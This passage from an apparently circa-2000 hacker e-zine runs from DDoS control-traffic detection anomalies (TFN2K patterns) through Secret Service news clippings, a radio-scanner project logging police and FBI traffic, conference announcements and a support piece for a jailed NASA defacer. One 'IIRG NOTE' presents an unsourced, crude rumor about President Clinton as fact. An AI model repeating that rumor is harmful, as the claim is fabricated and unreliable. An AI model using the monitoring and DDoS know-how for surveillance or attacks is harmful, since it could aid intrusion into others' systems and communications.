the encrypted target(s) and other options for the DDOS server. Once
(non-decoy) control traffic is spotted, one of the DDOS servers' location
is revealed, as the destination IP address is not spoofed in control traffic.

Anomaly 3: TCP packets (and UDP packets) that are not part of a connection.
The stealthiest DDOS tools use random protocols, including connection-oriented
protocols, to send data over non-connection-oriented channels. Using stateful
firewalls or link-state routing can discover these packets. Additionally,
packets that indicate connection requests with destination ports above 1024,
with which no known service is registered and running, are highly suspicious.

Anomaly 4: Packet payload contains ONLY alphanumeric character (e.g. no
spaces, punctuation, control characters). This can be a sign that the packet
payload is BASE64-encoded, and therefore contains only base64 characters.
TFN2K is sending such packets in its control traffic. A TFN2K (and TFN2K
derivatives) specific pattern is a string of repeating A's (AAAA...) in
the payload, since the buffer size is padded by the encryption routine. If
the BASE64 encoding is not used, and the payload contains binary encrypted
traffic, the A's will be trailing binary \0's.

Anomaly 5: Packet payload contains ONLY binary, high-bit characters. While
this can be a binary file transfer (traffic transmitted over ports 20, 21,
80, etc. must be excluded if this rule is applied), especially if contained
in packets that are not part of valid stateful traffic, it is suspicious
of being non-base64 encoded, but encrypted control traffic that is being
transmitted in the packet payload.



 - Mixter

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.1

iQEVAwUBOKdHVrdkBvUb0vPhAQGy2wf/XQ8d2VXKESzjyFzIqfRPd9S1RKXQZzGo
6yWnUADt3CuZRDmgJb9UYHJ/1Wf/J1V0PWik7GIJLD5zOXgUbgfdhYSOqJsPe14B
K3HaqraRFyMHXjb8A4TBC0RTEX3kepWFrMNePOge9rLPD8rwfhWdIrnJuyHmmNiS
rqVztFrPwfQl8FId5jjDjzXWlb5UuHgEpm1fNhrnjMh5XwFvVHN4MlJuuuk3ps9f
BVpBFJbSqmdb5GHTXCrw4tHHUHtpE7Iu586A6ODCERT1oM7i2SEroZ2x2xO2ssOx
cnyW3xFYcCNrJeJEzI9z+/VziYb1VqDl52MR7O1MSn/3SrAlVMvk2Q==
=GKzb
-----END PGP SIGNATURE-----

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [6]: The Nazi Files (Stories of the SS)
              Compiled By: The IIRG

-------------------------------------------------------------------------------

DISCORD IN THE SECRET SERVICE RANKS?

Black Secret Service Agents To Sue for Discrimination
By Gregory Vistica and Debra Rosenberg
Newsweek, February 22, 2000

On Wednesday, lawyers for 50 African-American Secret Service agents, 
including several who have guarded the First Family, prepared to file a 
class-action suit with the Equal Employment Opportunity Commission in 
Washington. The suit will claim that blacks are discriminated against in the 
agency's promotion process, according to lawyers representing the agents, 
and will also allege that too few blacks hold Secret Service management 
jobs.
The class action is an unusual public airing of complaints by employees of a 
necessarily secretive agency. The complaint will be filed first at the 
Department of Treasury, which oversees the Secret Service, before proceeding 
to the EEOC for review. To further try to correct what they view as a 
pattern of racial bias by their employer, several agents are now working to 
establish a formal association called BASS-Black Agents in the Secret 
Service-that will represent the rights of minorities. One agent involved 
with BASS says that as many as 100 African-American agents have expressed 
interest in joining the group.

On Thursday, Secret Service agents involved in the class action are 
scheduled to hold a press conference with their lawyers at the National 
Press Club. They plan to describe the hurdles they have faced in their 
efforts to be promoted and to discuss the everyday difficulties for blacks 
in an organization that is predominantly white, says their attorney, David 
Shaffer, of Thelen Reid & Priest. Shaffer successfully represented minority 
FBI agents in their 1991 class-action suit against the law-enforcement 
bureau. Shaffer's co-counsel is John Relman and Associates, the law firm 
that represented black Secret Service agents in their lawsuit against 
Denny's restaurants.

Shaffer describes those in charge of the agency's promotion process as 
"good-old boys" who consistently help their white friends win better jobs at 
the expense of qualified African Americans. He says the majority of Secret 
Service agents, black and white, score in the 90th percentile in 
job-performance rankings. Because of this, Shaffer says, personal 
relationships among managers, the majority of whom are white, are the key 
factor in who gets rewarded with a management job. "You have to know the 
higher-ups," Shaffer says, if you want to win a promotion.

There are approximately 2,300 non-uniformed agents who work around the 
world; some 200 of those agents are black, Shaffer says. But African 
Americans hold just 22 management jobs. Agents complain that all but a few 
of the top management jobs in large U.S. cities, including New York, Los 
Angeles and Chicago, are held by white agents. The exceptions, they say, are 
Atlanta and Dallas, cities in which blacks have had senior postings in the 
past.

"Certainly we're concerned," says Jim Mackin, a spokesman for the Secret 
Service. By late Wednesday, he said the agency had not yet received a copy 
of the complaint. Mackin said that the Secret Service has tried to maintain 
a diverse work force and provided some statistics that show black agents 
have indeed held senior posts. Of the seven assistant directors, two are 
African-American, he said. In addition Mackin said black agents head four of 
the eleven largest field offices.

A number of black agents who have worked on President Clinton's security 
detail could join the suit. Among them is Reginald Moore. Shaffer says Moore 
was passed over for the job of director of the Secret Service's operations 
center, though he was serving as its acting director. The man who got the 
job, says Shaffer, was white and was not as qualified as Moore, who was then 
transferred to the Dallas field office. Moore couldn't be reached for 
comment. Then there's Larry Cockell, formerly the lead agent on President 
Clinton's secret service detail, who was forced to testify by Ken Starr, the 
independent prosecutor. Cockell was reportedly in the running to be head of 
the Secret Service, but lost out to another candidate. Through Mackin, 
Cockell says he "is in no way associated with the complaint" and has no 
further comment.

The lawsuit may prove to be something of an embarrassment to the Clinton 
administration, which has made a concerted effort to court blacks for top 
jobs. Unfortunately, perhaps, for his security detail, the president has no 
power over which agents win promotions.

-----------------------------------------------------------------------------
CLINTON EVACUATED FROM HOTEL AFTER FIRE ALARM 

Friday February 25, 3:06 pm Eastern Time
Clinton evacuated from hotel after fire alarm
WASHINGTON, Feb 25 (Reuters) 

U.S. President Bill Clinton was evacuated from a Washington hotel along with
about 800 people attending an awards ceremony on Friday after a fire alarm 
went off.
Clinton joked about the buzzing that began just as he started speaking at the
event in a hotel ballroom. But when three fire officials entered the room, the
Secret Service decided to evacuate the president and others.
The president was escorted outside, got in his limousine and left the hotel in 
his motorcade for the White House. It was not immediately clear if there really 
was a fire.
The fire alarm first started while Secretary of Commerce William Daley was 
speaking but stopped for a few minutes before Clinton started to speak.
The president spoke through the fire alarm for a few minutes, apparently 
expecting the buzz to stop. ``Somebody tell me what the deal is. Is it a fire 
alarm, are we supposed to leave? Not yet...that's not an encouraging answer,'' 
he said to laughter.
``Unless somebody starts singing 'Smoke gets in your eyes' we may just start and 
go on,'' he said. A few moments later he broke away from his speech to say: 
``They're coming to get us. It really is a fire alarm... Thank you.'' 

IIRG NOTE - In a private interview with a hotel staff employee, it was
learned that Secret Service decided to evacuate the president because he 
apparently soiled his pants upon hearing the fire alarm.
He was rushed to the limousine after Secret Service agents grabbed several
hotel bath towels in an attempt to hide the presidents "accident".
Our contact claims hotel staff was sworn to secrecy and that several
Secret Service agents returned to the hotel afterwards to retrieve
the bath towels. One agent was heard muttering, "We need those god damned
towels. After Monica's dress we don't need any more physical evidence."

-----------------------------------------------------------------------------
SECRET SERVICE HARASSING BERNIE S AGAIN 
03/17/00 

Five years to the day after Bernie S. was arrested at gunpoint and subjected 
to nearly 17 months of imprisonment by the United States Secret Service, 
agents of the USSS have again begun some kind of cat and mouse game, the 
nature of which has yet to be revealed. 

A Special Agent from the Secret Service showed up unannounced at Bernie's 
workplace and told his employer they wanted to question Bernie, who happened 
to be out sick that day. When Bernie returned to work the following day and 
discovered the Secret Service wanted to talk to him, he surprised the agent 
by calling him. What followed was an extremely strange and circular 
conversation. 

At first the SS agent wouldn't talk to him at all. Then he called Bernie 
back and said they needed to talk with him at his home at 7am the next 
morning. When Bernie explained he was just getting over a serious illness 
and that this was an unreasonable hour, the agent suggested 6am. 
Bernie repeatedly offered to answer their questions at several neutral 
locations, but they said any place other than his home was unacceptable. 
Bernie told them he had nothing to hide, but that he was not comfortable 
having Secret Service agents poking around inside his house and that they 
would have to get a warrant before he'd let them in. The agent then said he 
had to go and would talk to him later. 

About ten minutes later, a second, more polished, SS agent called Bernie and 
continued trying to persuade him to let them inside his home. The agent tried
to goad Bernie by implying he must have something to hide, and that if he 
didn't then there was no reason why they shouldn't be allowed inside his 
home. At this point, Bernie tried to explain by saying if you asked 100 
people on the street if they'd want federal agents in their living room and 
bedroom, almost everyone would say no and that he was no exception. The SS 
agent disagreed, saying people have no legitimate fears about such a visit. 

Bernie repeatedly tried to get the SS agents to tell him what they wanted. 
Finally, the second agent said, "I need to check to see if your telephone 
and Cable TV wiring is hooked up properly." This preposterous claim made 
Bernie actually laugh out loud. But as a further gesture of cooperation, 
Bernie offered to allow Bell Atlantic and Comcast Cable TV technicians to 
inspect his house wiring for them. The SS agents said that, too, would be 
unacceptable. It became clear the SS agents were simply trying anything they 
could to get a foot in his door. Needless to say, after Bernie's previous 
horrendous experience with the Secret Service, their feet are not welcome in 
his home. He then gave them his attorney's name and telephone number and told
them to address future inquiries directly to his lawyer. 

So what is this all about? We don't know yet, but clearly something is up. 
And the way the Secret Service has played sick games with people's lives in 
the past, we felt it would be wise to alert everyone now so we can all keep a
closer eye on them before they try any further outrageous actions under the 
veil of secrecy. 

-------------------------------------------------------------------------------
Friday March 17, 2000; 3:10 PM EST
Hillary's Secret Service Agents Rough Up Reporters as St. Pat's Crowd Boos

Secret Service agents protecting first lady Hillary Clinton 
roughed up several reporters along the route of New York 
City's St. Patrick's Day parade, WABC Radio reported Friday 
afternoon.
To make matters worse, the United States Senate candidate was 
booed at several points along the Fifth Avenue parade route. A 
crowd of holiday revelers gathered at St. Patrick's Cathedral 
shouted "Go back to Arkansas" and "Find your own state."
"Secret Service agents literally are pushing press to the 
ground," reported WABC's Glenn Shuck. "They get back up again. 
Mrs. Clinton stops to shake hands again along the route and 
she's mobbed again by Secret Service." According to Shuck, 
Mrs. Clinton's security got rough with reporters at several 
points along the parade route.
"At one point one (Secret Service agent) grabbed me on my 
right side with his hands, and kind of grabbed my coat to hold 
me back, definitely forcefully," Shuck told afternoon 
drivetime talk show host Sean Hannity.
"The Secret Service just lost their minds, in my opinion," 
said Shuck. "I mean they just started pushing and shoving; 
female camera people five feet tall were getting thrown to the 
ground, cameras flying. Myself, I was grabbed by the shoulder, 
I was thrown back over. I think somebody from Channel 11 
landed on my back. From that point it really didn't get any 
better."
Minutes after Shuck's interview with Hannity, WABC's in-studio 
reporter George Webber announced, "Hillary Clinton's Secret 
Service agents today roughed up several members of the news 
media trying to cover the first lady's visit to the St. 
Patrick's Day parade. At least six reporters, including WABC's 
Glen Shuck, were pushed and tossed to the ground as they tried 
to get quotes from Mrs. Clinton."
The first lady's reaction:
"I love being a New Yorker. And this is the first time I've 
been able to march in this parade as a New Yorker. I could not 
be happier to be here."
                   
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [7]: IIRG Signal Intelligence (SIGINT) Guidelines
              By: Black IC <black_ic@iirg.org>

- BEGIN PROJECT -


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                   //////    //////     ///////     ////////
                    //        //       //    //    //
                   //        //       ///////     //   ////
                  //        //       //    //    //     //
               ////// *  //////  *  //     // * /////////

               The International Information Retrieval Guild

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

              The International Information Retrieval Guild

                Signal Intelligence (SIGINT) Guidelines

                            Rev. 1-2000-2-A

Part A: Summary

The purpose of this project is to confirm publicly available frequency
lists and update frequency listing and usage on undisclosed frequencies. 

Part B: Requirements

1. Scanner with or as close to the following ranges:

 27 -  54.000 MHz
108 - 136.975 MHz
137 - 174.000 MHz
406 - 512.000 MHz
806 - 823.937 MHz
851 - 868.937 MHz
896 - 956.000 MHz

2. Good antennae with good reception.
3. Working knowledge of "your" scanner.
4. Commitment and patience in terms of monitoring.
5. Commitment and initiative in terms of documenting.
6. We need to know your general area of living. (i.e. North East,
   Mid-West). Though some frequencies are national some are localized and
   this will allow us to cater to your area. Also knowing your scanners
   make and model will help in giving you frequency lists that you can
   work with.

Part C: Procedures 

You will receive a list of frequencies in order of priority that you will
monitor. These frequencies will have a duration period on how long you
will monitor and possibly what times. When you are done monitoring you
will move to the next frequency. Upon completion of your list please
submit your findings to black_ic@iirg.org

Please find enclose your documentation procedures and frequency list
catered to your capabilities.  Due to FCC regulations we are not
interested in the content of the traffic other than the parties involved
and at what times they were involved.  Though FCC frequency allocations
are public the parties they are reserved for change there usage and
sometimes use undisclosed frequencies that are not listed in the public
sector. 

1. Tune in to initial frequency on list.
2. Adjust reception and squelch as needed.
3. Listen to said frequency for instructed time at instructed time.
4. Document any traffic using the follow notations:
  
  A. Time (Military Time (GMT, EST, etc)
  B. Parties Involved (FBI, Media, PD, Pager)
  C. Code & Signals
  D. Duration of Transmission

Part D: Personal SIGINT Frequencies:

<Will be e-mailed>

                                The IIRG'00 
                           May Odin Guide Your Way...


- END PROJECT -

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [8]: The Rumor Mill

-----------------------------------------------------------------------------
  THIS IS THE OFFICIAL ANNOUNCEMENT FOR THE SECOND ANNUAL RUBI CON GROUP
                 DATA AND NETWORK SECURITY CONFERENCE

                                   AKA
 
                              RUBI CON 2000


                       Last updated on 2/23/2000

----------------------------------------------------------------------|
|           ____  __  ______  ____   __________  _   __               |
|          / __ \/ / / / __ )/  _/  / ____/ __ \/ | / /               |
|         / /_/ / / / / __  |/ /   / /   / / / /  |/ /                |
|        /  , _/ /_/ / /_/ // /   / /___/ /_/ / /|  /                 |
|       /_/ |_|\____/_____/___/   \_____\____/_/___/     ___      ___ |
|                                     |_  |    / _ \    / _ \    / _ \|
|************************************/ __/****/ // /***/ // /***/ // /|
|                                   /____/    \___/    \___/    \___/ |
|----------------------------------------------------------------------



-----------------------------------------------------------------------
Who: IT professionals and computer hackers
What: Three days of speakers, classes, games, and more
Where: Romulus, Michigan
Why: To teach, to learn, to understand
When: April 28-30, 2000 (Friday, Saturday, Sunday)
Cost: $100.00, $40.00 for students

Info: http://www.rubi-con.org
-----------------------------------------------------------------------


1. Rubi Con 2000 is a data and network security conference held annually
in metro Detroit. Three days of expert speakers, workshops, games and
contests, all with a casual, open atmosphere and a very unique goal. Our
intention is to bring together the two sides of system security: those on
the outside trying to get in, and those on the inside trying to keep
everyone else out. In the real world, it's IT professionals and security
experts versus "underground" crackers and computer hackers. These two
sides have much more in common than they often realize, and can learn more
from being in each other's presence than they might believe. Rubi Con is
here to bring them into contact with each other.

But we exist to provide information rather than an ideology. For while you
may learn how to break into computers at Rubi Con, you will also learn how
to fortify and defend them. We do not endorse illegal activity, only the
value of information.


2. Rubi Con offers three full days of expert speakers in both large group
and intimate classroom settings. Rubi Con speakers will offer sessions on
such diverse topics as advanced AS/400 security measures and the
philosophy of the modern computer hacker. All sessions are intended to be
highly interactive; questions and dialogue are encouraged to create a more
intimate and friendly atmosphere. Our speakers are professionals and
experts in their fields, many have Ph.D.s and nearly all have been
involved in information technology for decades.

We also offer unique games and contests to test your knowledge. Our
hacking contest is a race to break into secure network servers. Trivia
games offer fun prizes in exchange for obscure information. Do you have a
duck? You will if you play our (in)famous scavenger hunt.


3. Rubi Con occurs yearly in the metro Detroit area. This year we will 
be at the Wyndham Garden Hotel in Romulus Michigan, right at Detroit 
Metro Airport. The hotel is at 8600 Merriman Road, Romulus, MI 48174, 
United States. You can contact them at (313) 728-7900, or for reservations 
at (877) 999-3223. Wyndham Hotels has a web site here: 
http://www.wyndham.com. Rooms have been reduced to $80.00 per night for 
our group. Mention Rubi Con to receive the discount. The Wyndham requires 
that rooms be rented by credit card only, no cash unless you are over 21. 
See someone here if you are under 21 and are having trouble renting a 
room.


4. Rubi Con 2000 will occur Friday, April 28, Saturday, April 29, and
Sunday, April 30, 2000. The conference will run 24 hours a day, and enough
caffeine will be kept on hand for those who want to run 24 hours a day,
too. Registration begins at 3:00 PM on Friday. We shut our doors late on
Sunday, and all classes will run during the day, between the hours of
11:00 AM and 7:00 PM.


5. Tickets are $100.00, or $40.00 for students. Advanced tickets will cost $90.00 and $30.00, respectively. See our website for details on ordering tickets now. Advanced tickets will not be accepted after March 28, or one month prior to Rubi Con. The cost of a ticket covers all events, classes and speakers at Rubi Con 2000. You get a professional looking ID badge, and perhaps other goodies. Swanky RC2K T-shirts sold separately.


-----------------------------------------------------------------------
OTHER INFORMATION:

http://www.rubi-con.org
info@rubi-con.org
tickets@rubi-con.org

The above URL is the official Rubi Con web site. It contains all pertinent
information about this event such as current speaker listings and topics,
event schedules, information on games and contests, advanced ticket sales,
and more. The above email addresses are intended for general information
and ticket questions, respectively. Both are monitored by living,
breathing humans at all times.

-----------------------------------------------------------------------
CALL FOR SUPPORT:

We are always receptive to more speakers and presenters. If you have any
interest in teaching something at the next Rubi Con, contact our
operations director at tantalo@rubi-con.org. We are looking for people
with a background in information technology and with an interest in data
security. If this is you, send us a message.

If you think you or your company may be interested in donating resources
or equipment to Rubi Con 2000, please contact our business director at
deline@rubi-con.org. We are looking for support from companies with
network bandwidth, guest speakers, equipment, advertisement/promotional
materials, and any other contributions. If you or your company wants to
help make Rubi Con 2000 happen, send us a message.
-----------------------------------------------------------------------
READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
 
]]]]]]]]]]]]]]]]]] ]]] ]] ]  ]]   DEF CON 8 Initial Announcement
]]]]]]]^^^^]]]]]]]]]]]]] ]]  ] ]  DEF CON 8 Initial Announcement
]]]]]]^^^^^^]]]]] ]   ]     ]     DEF CON 8 Initial Announcement
]]]]]^^^^^^^^]]]]] ]]   ]         DEF CON 8 Initial Announcement
]]]]^^^^^^^^^^]]] ]  ]]]]]]]] ]   DEF CON 8 Initial Announcement
]]]^^^^^^^^^^^^]]]]]]]]]]  ]      DEF CON 8 Initial Announcement
]]^^^^^^^^^^^^^^]]]]]]   ]]   ]   DEF CON 8 Initial Announcement
]]]^^^^^^^^^^^^]]]]]]]]           DEF CON 8 Initial Announcement
]]]]^^^^^^^^^^]]]]]]]]  ]  ]]     DEF CON 8 Initial Announcement
]]]]]^^^^^^^^]]]]]]] ]]]   ]]  ]  DEF CON 8 Initial Announcement
]]]]]]^^^^^^]]]]]]] ] ]  ]        DEF CON 8 Initial Announcement
]]]]]]]^^^^]]]]]]]]]]] ]] ] ]     DEF CON 8 Initial Announcement
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]] ]  DEF CON 8 Initial Announcement
 
READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE & READ & DISTRIBUTE
 
WTF is this?  This is the initial announcement and invitation to DEF CON 00,
a convention for the "underground" elements of the computer culture.  We try
to target the (Fill in your favorite word here): Hackers, Phreaks, Hammies,
Virii coders, programmers, crackers, Cyberpunk Wannabes, Civil Liberties
Groups, CypherPunks, Futurists, etc..
 
WHO:   You know who you are, you shady characters.
WHAT:  A convention for you to meet, party, and listen to some speeches that
       you would normally never hear.
WHEN:  July 28th - 30th, 2000
WHERE: Las Vegas, Nevada @ Alexis Park Resort

What is DEF CON? 

DEF CON is an annual computer underground party for hackers held in Las Vegas,
Nevada, every summer for the past six years.  Over those years it has grown in
size, and attracted people from all over the planet.  Well, no one from 
North Korea has shown up (that we know of) but if they did I'm sure we would 
convince them to tell us elite government secrets.  That's what it is all 
about.  Meeting other spies, er, people and learning something new. 

We are not trying to teach you to learn how to hack in a weekend, but what we
are trying to do is create an environment where you can hang out with people 
from all different backgrounds. All of them interested in the same thing, 
computer security.  To do this we have taken over the complete hotel at the 
Alexis Park Resort.  Does all of this seem interesting?  Then it can be yours 
for the low, low price of only $50 at the door. 

If you want a greater idea of what it is all about, and what other people 
have had to say about the convention please visit the previous year's 
archives sections and read what the media and attendees have had to say. 

There has been an awful lot of press written about DEF CON over the years. 
Some of it good, most of it too fixated on the attendees green hair.  
If you want to see what people have written, check out the previous years 
archives for the links.
 
Current Speakers 
----------------

There is currently a call for speakers.
Please email DTangent if you want to exhibit, or sponsor DEF CON 8
------------------------------------------------------------------
Gregory B. White, Ph.D. 
The USAFA Cadet Hacking Case:  
What both sides should learn about computer forensics 

Basically I'll discuss the case that went to trial in the spring of
99.  I was the Deputy Head of the Computer Science Department at the
USAF Academy at the time and was asked by the cadet accused of "hacking"
to help with his defense.  I testified at the trial as an expert witness
for the Defense.  I sat at the Defense table throughout the trial serving
as their "computer expert".  Basically the trial was a comedy of errors
by the prosecution. law enforcement, and the cadet's attorneys alike.
 The cadet was involved in IRC but the law enforcement types and prosecution
became convinced that he was the "hacker" (afterall, everybody KNOWS
that IRC is nothing more than a place for hackers to trade information
on how to break into computers -- the actual sentiment expressed by
the investigators).  I had up to that point spent the majority of my
time in the Air Force trying to protect systems and to catch those who
broke into AF systems.  This case really shook me as I saw the LE types
latch onto the smallest of indicators and blow them into a full blown
felony case (the cadet faced 15 years in Leavenworth had he been convicted
of all counts).  What I will cover in the talk is: 

1)  Background of the case 2)  The "evidence" the prosecution thought
they had 3)  The many possible areas where clues might have been found
had either side known where to look (or asked anybody who knew anything
about it) 4)  What lessons can be learned from this case.  Those from
the government and industry need to know where to look if they want
to catch folks (and if they want to make sure they don't make fools
of themselves) and those who might find themselves accused someday need
to know how to help their attorneys find clues that could exonerate
them. 

Gregory B. White, Ph.D. - Vice President, Professional Services.  Gregory
White joined SecureLogix in March 1999 as the Chief Technology Officer.
 Before joining SecureLogix, he was the Deputy Head of the Computer
Science Department and an Associate Professor of Computer Science at
the United States Air Force Academy in Colorado Springs, Colorado. 
While at the Academy, Dr. White was instrumental in the development
of two courses on computer security and information warfare and in ensuring
that security was taught throughout the computer science curriculum.
 During his two tours at the Academy, he authored a number of papers
on security and information warfare and is a co-author for two textbooks
on computer security. 

Between his Air Force Academy assignments, Dr. White spent three years
at Texas A&M University working on his Ph.D. in computer science.  His
dissertation topic was in the area of host- and network-based intrusion
detection.  Prior to his Academy assignments, Dr. White was a student
at the Air Force's Advanced Communications-Computer Systems Staff Officer
Course in Biloxi, Mississippi.  He was awarded both the AFCEA and Webb
awards for student leadership and academic excellence and was a Distinguished
Graduate of the course.  Before attending the course in Biloxi, Dr.
White served as the Branch Chief of the Network Security Branch at the
Cryptologic Support Center in San Antonio, Texas.  His first assignment
in the Air Force was as a systems analyst at the Strategic Air Command
Headquarters in Omaha, Nebraska.  Dr. White obtained his Ph.D. in Computer
Science from Texas A&M University in 1995.  He received his Masters
in Computer Engineering from the Air Force Institute of Technology in
1986 and his Bachelors in Computer Science from Brigham Young University
in 1980.  He separated from the Air Force in 1999 and is currently serving
in the Air Force Reserves at the Defense Information Systems Agency.
 
Ron Moritz, Chief Technology Officer Finjan Software, Inc. 
Proactive Defense Against Malicious Code 

Anti-virus software is an important part of a well-devised security
policy, but reactive virus detection is not versatile enough for the
demands that will be made on businesses engaged in e-commerce. The year
1999 began with the birth of the Happy 99 virus - a harbinger of things
to come. Happy 99, plus Melissa, PrettyPark and the Explore.zip worm
are all examples of third generation of malicious replicating code,
designed to exploit the Internet for their rapid proliferation. A variant
of Explore.zip, called MiniZip, managed to hide itself from antiviral
utilities and spread at an amazing rate around the Internet at the end
of 1999. Such programs, which launch new malicious code attacks, create
"first strikes" against systems and networks. Allowing untrusted code
to execute on the corporate network may not be suitable for your organization.
But corporate security policies that block network executables adversely
affect the evolution of the Internet, extranet, and intranet. While
no security implementation is absolute, functionality is not achieved
by disconnecting users from the network and preventing access to programs.
Therefore, proactive defense against first-strike attacks is required
today. 

Almost all web sites today contain mobile code. Many of the powerful
business (ecommerce) applications you need and use are written with
mobile code. Consequently, net-enabled malicious software is likely
to increase in prevalence and successful utilization. The factors accounting
for such a prediction are the ease by which users are duped into double-clicking on malicious e-mail attachments and, the ease by which the sources
 on malicious e-mail attachments and, the ease by which the sources
of those e-mails are automatically spoofed to seem to come from a boss
or from an e-mail or instant message friend. Traditional pattern matching
approaches are incomplete, out-of-date, and ineffective and were never
designed in preventing a series of new generation attacks based on malicious
mobile code and Trojan executables. 

Ron Moritz is the Chief Technology Officer at Finjan Software where
he serves as primary technology visionary. As a key member of the senior
management team interfacing between sales, marketing, product management,
and product development, Ron helps establish and maintain the company's
technological standards and preserve the company's leadership role as
a developer of advanced Internet security solutions. Ron was instrumental
in the organization of Finjan's Java Security Alliance and established
and chairs Finjan's Technical Advisory Board. He is currently chairing
the Common Content Inspection API industry standards initiative. Ron
is one of a select group of Certified Information Systems Security Professionals. He earned his M.S.E., M.B.A., and B.A. from Case Western Reserve University
. He earned his M.S.E., M.B.A., and B.A. from Case Western Reserve University
in Cleveland, Ohio.
 
WHERE THIS THING IS:
--------------------
 
It's in Las Vegas, the town that never sleeps.  Really. There are no clocks
anywhere in an attempt to lull you into believing the day never ends.  Talk
about virtual reality, this place fits the bill with no clunky hardware.  If
you have a buzz you may never know the difference.  It will be at the Sahara
Hotel.  Intel as follows:
 
Hotel Location 

The Convention will be held at the Alexis Park Hotel and Resort 
We are taking over the complete hotel!

The Alexis Park Hotel and Resort is across the street from the Hard
Rock Hotel, and is a block off the main strip.   Located at 375 E Harmon
Ave in Las Vegas, NV 89109.  The Alexis Park is a non gambling hotel,
so people 18 years and older can get a room there.  This is the first
time that has ever happened for us!  If there are any problems with
this please email me!  

HOTEL COSTS: Room rates are 85$ for a two bed suite, but you can get
up to four people in one. 

RESERVATIONS: On-line or by phone: 800-453-8000 

We have the whole hotel space, so unless you reference the DEF CON show
the Alexis Park will tell you they are sold out. 

We have all the rooms at the Alexis Park, and a bunch next door at the
San Tropez.  We are working on a block of rooms at the Hard Rock Hotel.
 At last count about 20% of the rooms at the Alexis Park were already
booked.  Sign up early if you want to stay at the main hotel! 

We start Friday, but many people get in Thursday night and hang out
before the fun begins.  We get our convention room rate from Wednesday
night through Monday night for those wanting to stay longer to check
out the attractions. 
 
 
Cheap Airfare Information 

We've got great discounts on airfare from Montrose Travel, who book
bulk air travel for cheap.  If you need to still book tickets give these
guys a call first and compare. 

Montrose Travel  1-800-301-9673 
http://www.montrosetravel.com 
or email Montrose Travel with questions. 

They currently have deals for DEF CON attendees from the US and International
on the following airlines:
 

America West Southwest Delta 
American Southwest Airlines United Airlines 
and other smaller carriers and even International Airfare rates. 

Expect rates lower than published.  When calling make sure you refer
to DEF CON as the group name. 

 
COST:
 
Cost is whatever you pay for a hotel room split however many ways, plus
$50.00 at the door. There are fast food places all over, and there is 
alcohol all over the place, the trick is to get it during a happy hour 
for maximum cheapness.
-----------------------------------------------------------------------------
Hope 2000 is Coming.

 http://www.h2k.net

   July 14th to July 16th, 2000.
          New York City 
-----------------------------------------------------------------------------

Postcards From The Edge BBS

Formerly a Renegade DOS Based Dial-Up BBS is now and has been available
via telnet at luna.iirg.org

PFTE carries an eclectic topic structure surrounding SIGINT, Telephony, RF
Hacking, UNIX, Kit Bashing, and others.  No restrictions on
applying.  Just login and be apart of an on going history surrounding this
board.

The present life of this board is running Citadel.  You can access this
system via telnet or the web.

www.iirg.org/pfte.html

luna.iirg.org

Login: bbs
Password: <enter>

Any questions: black_ic@iirg.org

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [9]: FREE the FISH
              By: Mercenary <iirg@iirg.org>
                  with assistance from BoW 
                  http://www.bow.org/trout/

.a@&$$$ .a@&$&@a.   .a&$$$$ .a&$$$$      .a@&$$$ .a$$$a. .a@&$$$ a$$  $$a
 $$$$$$$ $$$'  `$$$  $$$$$$$ $$$$$$$      $$$$$$$ $$$$$$$ $$$$$$$ $$$  $$$
 $$$     $$$. .a&$'  $$$'    $$$'         $$$     `$$$$$' $$$$.   $$$  $$$
 $$$$$$  $$$$$$$'    $$$$$a  $$$$$a  THE  $$$$$$  .aaaaa. `$$$$a. $$$$$$$$
 $$$     $$$ `$$a.   $$$.    $$$.         $$$     $$$$$$$   `$$$$ $$$  $$$
 $$$     $$$  `$$$a. $$$$$$$ $$$$$$$      $$$     $$$$$$$ $$$$$$$ $$$  $$$
 $$$     $$$   `$$$' `$$$$$$ `$$$$$$      $$$     `$$$$$' "$$$$$" $$$  $$$

 I guess that for 2600 Magazine to offer you any support, you must have to 
have a book written about you or be a high profile media grabbing celebrity.
 Yet when Jason Mewhiney's (AKA - Tr0ut) defaced NASA's main page on March 
5th 1997 and offered support to 2600 Magazines two poster boys (Kevin Mitnick 
and Ed Cummings - AKA Bernie S), wouldn't you think that Eric Corley (AKA - 
Emmanuel Goldstein) might offer just a little support or media exposure to 
Jason?
 Well this support hasn't surfaced yet. Please read the following 
information and offer Jason the support that 2600 Magazine hasn't.

-----------------------------------------------------------------------------

About Jason Mewhiney's Case

NASA V. JASON MEWHINEY

I. Proceedings to Date

Jason originally faced fifty one charges and a $70,000 fine for his alleged 
involvement in the defacement of NASA's main page on March 5, 1997. This is 
however simply the culmination of years of harassment that Jason has faced 
from both the American and Canadian authorities.

A. Jason's current situation

Jason is currently serving a six-month prison sentence in Canada after 
entering into a plea agreement that reduced his charges. In sentencing him, 
Justice John Poupore said, "You sir, are a convicted criminal. That is a 
distinction you will carry with you for the rest of your life. It is nothing 
to be proud of." This is true -- there will be no badge of pride on Jason's 
sleeve when he leaves prison. When he does, it will be as convicted 
computer-criminal, potentially facing similar restrictions to those faced 
by Kevin Mitnick upon his release. Jason began his sentence in a medium - 
maximum security prison in Sudbury, Ontario. Everyone in the prison was about
twice his age. Most of them hard-core criminals, including several convicted 
murders serving 2 back to back life sentences.
About 2 weeks ago he was transferred to a facility in timmins ON, which 
according to Jason, is at least 10 times worse than the first prison. Jason 
has been forced to endure countless hardships in the short time he has been 
